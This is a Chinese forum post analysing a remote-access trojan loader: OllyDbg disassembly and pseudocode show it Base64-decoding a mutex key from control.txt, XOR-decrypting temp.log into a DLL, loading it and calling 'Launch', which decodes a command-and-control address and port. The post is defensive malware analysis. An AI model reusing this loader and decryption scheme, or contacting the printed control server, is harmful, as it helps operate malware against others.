首页
论坛
专栏
课程

[调试逆向] [病毒木马] [原创]记一次远控木马的分析

2018-2-8 23:48 3726

[调试逆向] [病毒木马] [原创]记一次远控木马的分析

2018-2-8 23:48
3726

0x0 概述

朋友电脑中毒,从他的电脑拷出来的...

0x1 环境 & 工具

环境: win7 x32 
工具: OD     IDA         DLL Export Viewer         LordPE

0x2 分析



control.txt 放了一段疑似Base64加密后的文本

尝试揭秘后
解密前: N1hZMG9NTjhvVHwyMDk5MjA=

解密后: 7XY0oMN8oT|209920

temp.log里则是乱码  肯定是被加密了


help.exe  好像是vs的资源编辑器 



rcdll.dll  加了UPX 这里用了esp定律直接脱掉  
看下他的两个导出函数
100012E0 RCDLL.Handler     $  C3            retn
100012E1                      90            nop
100012E2                      90            nop
100012E3                      90            nop


100010C0 RCDLL.RC         /$  81EC 14030000 sub esp,0x314
100010C6                  |.  53            push ebx
100010C7                  |.  55            push ebp
100010C8                  |.  56            push esi
100010C9                  |.  57            push edi
100010CA                  |.  33DB          xor ebx,ebx
100010CC                  |.  B9 40000000   mov ecx,0x40
100010D1                  |.  33C0          xor eax,eax
100010D3                  |.  8D7C24 19     lea edi,dword ptr ss:[esp+0x19]
100010D7                  |.  885C24 18     mov byte ptr ss:[esp+0x18],bl
100010DB                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100010E0                  |.  F3:AB         rep stos dword ptr es:[edi]              ; |
100010E2                  |.  66:AB         stos word ptr es:[edi]                   ; |
100010E4                  |.  AA            stos byte ptr es:[edi]                   ; |
100010E5                  |.  8D4424 1C     lea eax,dword ptr ss:[esp+0x1C]          ; |
100010E9                  |.  50            push eax                                 ; |PathBuffer
100010EA                  |.  53            push ebx                                 ; |hModule => NULL
100010EB                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100010F1                  |.  8D4C24 18     lea ecx,dword ptr ss:[esp+0x18]
100010F5                  |.  51            push ecx                                 ; /Path
100010F6                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
100010FC                  |.  8D5424 18     lea edx,dword ptr ss:[esp+0x18]
10001100                  |.  68 48800010   push 10008048                            ; /StringToAdd = "\control.txt"
10001105                  |.  52            push edx                                 ; |ConcatString
10001106                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
1000110C                  |.  53            push ebx                                 ; /hTemplateFile => NULL
1000110D                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
10001112                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001114                  |.  53            push ebx                                 ; |pSecurity => NULL
10001115                  |.  6A 03         push 0x3                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
10001117                  |.  8D4424 2C     lea eax,dword ptr ss:[esp+0x2C]          ; |
1000111B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001120                  |.  50            push eax                                 ; |FileName
10001121                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001127                  |.  8BF8          mov edi,eax
10001129                  |.  53            push ebx                                 ; /pFileSizeHigh => NULL
1000112A                  |.  57            push edi                                 ; |hFile
1000112B                  |.  895C24 18     mov dword ptr ss:[esp+0x18],ebx          ; |
1000112F                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001135                  |.  8BE8          mov ebp,eax
10001137                  |.  55            push ebp
10001138                  |.  E8 070A0000   call 10001B44
1000113D                  |.  83C4 04       add esp,0x4
10001140                  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10]
10001144                  |.  8BF0          mov esi,eax
10001146                  |.  53            push ebx                                 ; /pOverlapped
10001147                  |.  51            push ecx                                 ; |pBytesRead
10001148                  |.  55            push ebp                                 ; |BytesToRead
10001149                  |.  56            push esi                                 ; |Buffer
1000114A                  |.  57            push edi                                 ; |hFile
1000114B                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
10001151                  |.  8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C]        ;  kernel32.CloseHandle
10001157                  |.  57            push edi                                 ; /hObject
10001158                  |.  FFD5          call ebp                                 ; \CloseHandle
1000115A                  |.  56            push esi                                 ; /MutexName
1000115B                  |.  53            push ebx                                 ; |InitialOwner
1000115C                  |.  53            push ebx                                 ; |pSecurity
1000115D                  |.  FF15 18700010 call dword ptr ds:[0x10007018]           ; \CreateMutexA
10001163                  |.  8BF8          mov edi,eax
10001165                  |.  FF15 14700010 call dword ptr ds:[0x10007014]           ; [GetLastError
1000116B                  |.  3D B7000000   cmp eax,0xB7
10001170                  |.  75 0A         jnz short 1000117C
10001172                  |.  57            push edi                                 ; /hObject
10001173                  |.  FFD5          call ebp                                 ; \CloseHandle
10001175                  |.  53            push ebx                                 ; /ExitCode
10001176                  |.  FF15 10700010 call dword ptr ds:[0x10007010]           ; \ExitProcess
1000117C                  |>  B9 40000000   mov ecx,0x40
10001181                  |.  33C0          xor eax,eax
10001183                  |.  8DBC24 210200>lea edi,dword ptr ss:[esp+0x221]
1000118A                  |.  889C24 200200>mov byte ptr ss:[esp+0x220],bl
10001191                  |.  F3:AB         rep stos dword ptr es:[edi]
10001193                  |.  66:AB         stos word ptr es:[edi]
10001195                  |.  AA            stos byte ptr es:[edi]
10001196                  |.  8B4424 10     mov eax,dword ptr ss:[esp+0x10]
1000119A                  |.  8D9424 200200>lea edx,dword ptr ss:[esp+0x220]
100011A1                  |.  52            push edx
100011A2                  |.  50            push eax
100011A3                  |.  56            push esi
100011A4                  |.  E8 67010000   call 10001310                            ;  Base64 解密
100011A9                  |.  8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C]
100011B0                  |.  68 44800010   push 10008044                            ;  UNICODE "|"
100011B5                  |.  51            push ecx
100011B6                  |.  E8 E5080000   call 10001AA0
100011BB                  |.  83C4 14       add esp,0x14
100011BE                  |.  50            push eax                                 ; /String2
100011BF                  |.  68 00AB0010   push 1000AB00                            ; |String1 = RCDLL.1000AB00
100011C4                  |.  FF15 0C700010 call dword ptr ds:[0x1000700C]           ; \lstrcpyA
100011CA                  |.  B9 40000000   mov ecx,0x40
100011CF                  |.  33C0          xor eax,eax
100011D1                  |.  8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D]
100011D8                  |.  889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl
100011DF                  |.  F3:AB         rep stos dword ptr es:[edi]
100011E1                  |.  66:AB         stos word ptr es:[edi]
100011E3                  |.  8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C]
100011EA                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100011EF                  |.  52            push edx                                 ; |PathBuffer
100011F0                  |.  53            push ebx                                 ; |hModule
100011F1                  |.  AA            stos byte ptr es:[edi]                   ; |
100011F2                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100011F8                  |.  8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C]
100011FF                  |.  50            push eax                                 ; /Path
10001200                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
10001206                  |.  8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C]
1000120D                  |.  68 38800010   push 10008038                            ; /StringToAdd = "\temp.log"
10001212                  |.  51            push ecx                                 ; |ConcatString
10001213                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
10001219                  |.  53            push ebx                                 ; /hTemplateFile
1000121A                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
1000121F                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001221                  |.  53            push ebx                                 ; |pSecurity
10001222                  |.  6A 01         push 0x1                                 ; |ShareMode = FILE_SHARE_READ
10001224                  |.  8D9424 300100>lea edx,dword ptr ss:[esp+0x130]         ; |
1000122B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001230                  |.  52            push edx                                 ; |FileName
10001231                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001237                  |.  8BF0          mov esi,eax
10001239                  |.  53            push ebx                                 ; /pFileSizeHigh
1000123A                  |.  56            push esi                                 ; |hFile
1000123B                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001241                  |.  8BF8          mov edi,eax
10001243                  |.  895C24 14     mov dword ptr ss:[esp+0x14],ebx
10001247                  |.  57            push edi
10001248                  |.  E8 F7080000   call 10001B44
1000124D                  |.  83C4 04       add esp,0x4
10001250                  |.  8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]
10001254                  |.  A3 08AC0010   mov dword ptr ds:[0x1000AC08],eax
10001259                  |.  53            push ebx                                 ; /pOverlapped
1000125A                  |.  51            push ecx                                 ; |pBytesRead
1000125B                  |.  57            push edi                                 ; |BytesToRead
1000125C                  |.  50            push eax                                 ; |Buffer
1000125D                  |.  56            push esi                                 ; |hFile
1000125E                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
10001264                  |.  56            push esi
10001265                  |.  FFD5          call ebp
10001267                  |.  8B5424 14     mov edx,dword ptr ss:[esp+0x14]
1000126B                  |.  52            push edx                                 ;  文件大小
1000126C                  |.  68 08AC0010   push 1000AC08                            ;  文件buf
10001271                  |.  E8 8AFDFFFF   call 10001000                            ;  解密call
10001276                  |.  A1 08AC0010   mov eax,dword ptr ds:[0x1000AC08]
1000127B                  |.  50            push eax
1000127C                  |.  E8 2F020000   call 100014B0                            ;  加载dll
10001281                  |.  83C4 0C       add esp,0xC
10001284                  |.  3BC3          cmp eax,ebx
10001286                  |.  A3 F8AA0010   mov dword ptr ds:[0x1000AAF8],eax
1000128B                  |.  74 3D         je short 100012CA
1000128D                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
10001292                  |.  50            push eax
10001293                  |.  E8 C8060000   call 10001960                            ;  GetProcAddress 获取Launch函数地址
10001298                  |.  83C4 08       add esp,0x8
1000129B                  |.  3BC3          cmp eax,ebx
1000129D                  |.  74 19         je short 100012B8
1000129F                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
100012A4                  |.  FFD0          call eax                                 ;  调用Launch
100012A6                  |.  8B35 08700010 mov esi,dword ptr ds:[0x10007008]        ;  kernel32.Sleep
100012AC                  |.  83C4 04       add esp,0x4
100012AF                  |>  68 A0860100   /push 0x186A0
100012B4                  |.  FFD6          |call esi
100012B6                  |.^ EB F7         \jmp short 100012AF
100012B8                  |>  A1 F8AA0010   mov eax,dword ptr ds:[0x1000AAF8]
100012BD                  |.  3BC3          cmp eax,ebx
100012BF                  |.  74 09         je short 100012CA
100012C1                  |.  50            push eax
100012C2                  |.  E8 E9010000   call 100014B0
100012C7                  |.  83C4 04       add esp,0x4
100012CA                  |>  5F            pop edi
100012CB                  |.  5E            pop esi
100012CC                  |.  5D            pop ebp
100012CD                  |.  5B            pop ebx
100012CE                  |.  81C4 14030000 add esp,0x314
100012D4                  \.  C3            retn



直接定位关键点 
(1) 读入文件目录下的control.txt
(2)用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 创建互斥体 ,如果创建失败,则结束进程



(3) 将  N1hZMG9NTjhvVHwyMDk5MjA=   进行解密    解密的结果与刚开始猜测的一样
(4) 把解密后内容  7XY0oMN8oT|209920   以 " | " 进行分割 并将   7XY0oMN8oT  用 lstrcoyA 到 0x1000AB00



(5) 读入当前目录 temp.log  并进行解密


解密前:

解密后:


解密 call

10001000  /$  53            push ebx
10001001  |.  57            push edi
10001002  |.  68 00AB0010   push 1000AB00                            ; /String = "7XY0oMN8oT"
10001007  |.  FF15 00700010 call dword ptr ds:[0x10007000]           ; \lstrlenA
1000100D  |.  8B5C24 10     mov ebx,dword ptr ss:[esp+0x10]
10001011  |.  33C9          xor ecx,ecx
10001013  |.  85DB          test ebx,ebx
10001015  |.  8BF8          mov edi,eax
10001017  |.  7E 24         jle short 1000103D
10001019  |.  55            push ebp
1000101A  |.  8B6C24 10     mov ebp,dword ptr ss:[esp+0x10]
1000101E  |.  56            push esi
1000101F  |>  8B45 00       /mov eax,dword ptr ss:[ebp]
10001022  |.  8D3408        |lea esi,dword ptr ds:[eax+ecx]
10001025  |.  8BC1          |mov eax,ecx
10001027  |.  99            |cdq
10001028  |.  F7FF          |idiv edi
1000102A  |.  8A06          |mov al,byte ptr ds:[esi]
1000102C  |.  8A92 00AB0010 |mov dl,byte ptr ds:[edx+0x1000AB00]
10001032  |.  32C2          |xor al,dl
10001034  |.  41            |inc ecx
10001035  |.  3BCB          |cmp ecx,ebx
10001037  |.  8806          |mov byte ptr ds:[esi],al
10001039  |.^ 7C E4         \jl short 1000101F
1000103B  |.  5E            pop esi
1000103C  |.  5D            pop ebp
1000103D  |>  5F            pop edi
1000103E  |.  5B            pop ebx
1000103F  \.  C3            retn


解密函数伪代码

char __cdecl sub_10001000(_DWORD *a1, int a2)
{
  int v2; // eax
  int v3; // ecx
  int i; // edi
  _BYTE *v5; // esi

  v2 = MEMORY[0x75BFCC62](byte_1000AB00); 1000AB00就是刚才储存  7XY0oMN8oT 的地址
  v3 = 0;
  for ( i = v2; v3 < a2; *v5 = v2 )
  {
    v5 = (_BYTE *)(*a1 + v3);
    LOBYTE(v2) = byte_1000AB00[v3++ % i] ^ *v5;
  }
  return v2;
}


(6) 将解密后dll加载  并 GetProcAddress 获取 Launch函数地址  接着调用

Launch 

00628E90    55              push ebp                                 ; kernel32.CloseHandle
00628E91    8BEC            mov ebp,esp
00628E93    81EC F8010000   sub esp,0x1F8
00628E99    A1 10E26400     mov eax,dword ptr ds:[0x64E210]
00628E9E    33C5            xor eax,ebp
00628EA0    8945 FC         mov dword ptr ss:[ebp-0x4],eax
00628EA3    56              push esi
00628EA4    68 F3010000     push 0x1F3
00628EA9    8D85 09FEFFFF   lea eax,dword ptr ss:[ebp-0x1F7]
00628EAF    6A 00           push 0x0
00628EB1    50              push eax
00628EB2    C685 08FEFFFF 0>mov byte ptr ss:[ebp-0x1F8],0x0
00628EB9    E8 92B00000     call 00633F50
00628EBE    83C4 0C         add esp,0xC
00628EC1    68 78F76400     push 0x64F778                            ; ASCII "MTIzLjEwMy4yNDcuMTcwfDU1NTZ8"
00628EC6    FF15 FC316400   call dword ptr ds:[0x6431FC]             ; kernel32.lstrlenA
00628ECC    50              push eax
00628ECD    8D85 08FEFFFF   lea eax,dword ptr ss:[ebp-0x1F8]
00628ED3    E8 1887FFFF     call 006215F0
00628ED8    8D8D 08FEFFFF   lea ecx,dword ptr ss:[ebp-0x1F8]
00628EDE    68 F8916400     push 0x6491F8                            ; UNICODE "|"
00628EE3    51              push ecx
00628EE4    E8 4AA20000     call 00633133
00628EE9    83C4 0C         add esp,0xC
00628EEC    50              push eax
00628EED    68 30F66400     push 0x64F630
00628EF2    FF15 08326400   call dword ptr ds:[0x643208]             ; kernel32.lstrcpyA
00628EF8    68 F8916400     push 0x6491F8                            ; UNICODE "|"
00628EFD    6A 00           push 0x0
00628EFF    E8 2FA20000     call 00633133
00628F04    50              push eax
00628F05    E8 D99F0000     call 00632EE3
00628F0A    68 F8916400     push 0x6491F8                            ; UNICODE "|"
00628F0F    6A 00           push 0x0
00628F11    A3 34F76400     mov dword ptr ds:[0x64F734],eax
00628F16    E8 18A20000     call 00633133
00628F1B    83C4 14         add esp,0x14
00628F1E    68 78F76400     push 0x64F778                            ; ASCII "MTIzLjEwMy4yNDcuMTcwfDU1NTZ8"
00628F23    6A 00           push 0x0
00628F25    6A 00           push 0x0
00628F27    FF15 FC306400   call dword ptr ds:[0x6430FC]             ; kernel32.CreateMutexA
00628F2D    8BF0            mov esi,eax
00628F2F    FF15 8C306400   call dword ptr ds:[0x64308C]             ; kernel32.GetLastError
00628F35    3D B7000000     cmp eax,0xB7
00628F3A    75 0F           jnz short 00628F4B
00628F3C    56              push esi
00628F3D    FF15 48306400   call dword ptr ds:[0x643048]             ; kernel32.CloseHandle
00628F43    6A 00           push 0x0
00628F45    FF15 F8306400   call dword ptr ds:[0x6430F8]             ; kernel32.ExitProcess
00628F4B    E8 C0FBFFFF     call 00628B10                            ; 进入功能。。


(7) 同样的套路   将 MTIzLjEwMy4yNDcuMTcwfDU1NTZ8 用Base64解密  得到上线地址:123.103.247.170 以及上线端口: 5556
(8) 用  MTIzLjEwMy4yNDcuMTcwfDU1NTZ8 创建互斥体 创建失败则退出软件
(9) 发送上线封包.......
解密前: MTIzLjEwMy4yNDcuMTcwfDU1NTZ8

解密后: 123.103.247.170|5556|



0x3 总结


没啥好总结的....
第一次发帖不小心点了返回 也是悲催...
表述能力有限,文中有错误的地方望大家指出..
最后提前祝大家 狗年旺旺,旺事如意! 

样本
MD5: ed06199d9c9f30d5a7fbae0e8e49b95f
SHA1: 54c497ed337691ef507dd63ee9d7a21669a0352f



[公告]看雪20周年会 | 感恩有你,一路同行

上传的附件:
最新回复 (3)
自然卷 2018-2-9 00:07
2
0
不明觉厉
八岛 1 2018-3-20 15:55
3
0
C&C部分没多少呀
游客
登录 | 注册 方可回帖
返回